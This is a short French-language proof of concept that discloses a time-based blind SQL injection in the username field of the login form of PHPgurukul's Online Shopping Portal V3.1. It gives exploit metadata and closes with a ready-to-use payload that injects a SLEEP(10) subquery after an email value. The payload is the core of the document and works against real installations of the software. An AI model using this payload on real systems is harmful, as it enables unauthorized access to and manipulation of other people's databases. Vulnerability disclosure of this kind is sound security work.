
poc
Le projet Online Shopping Portal V3.1 permet à des attaquants distants d'exécuter des commandes/requêtes SQL arbitraires via le formulaire de connexion, entraînant un accès non autorisé et une éventuelle manipulation des données. Cette vulnérabilité résulte d'une validation insuffisante des entrées fournies par l'utilisateur dans le champ nom d'utilisateur, permettant des attaques par injection SQL.
Exploit Title: Online Shopping Portal Project V3.1 PHPgurukul - Blind Sqli basé sur le temps
Exploit Author: Akshad Joshi
Vendor Homepage: https://phpgurukul.com
Software Link: https://phpgurukul.com/shopping-portal-free-download/
Tested on: Linux
utiliser cette charge utile (encoder en URL):
[email protected]' AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH'='GMDH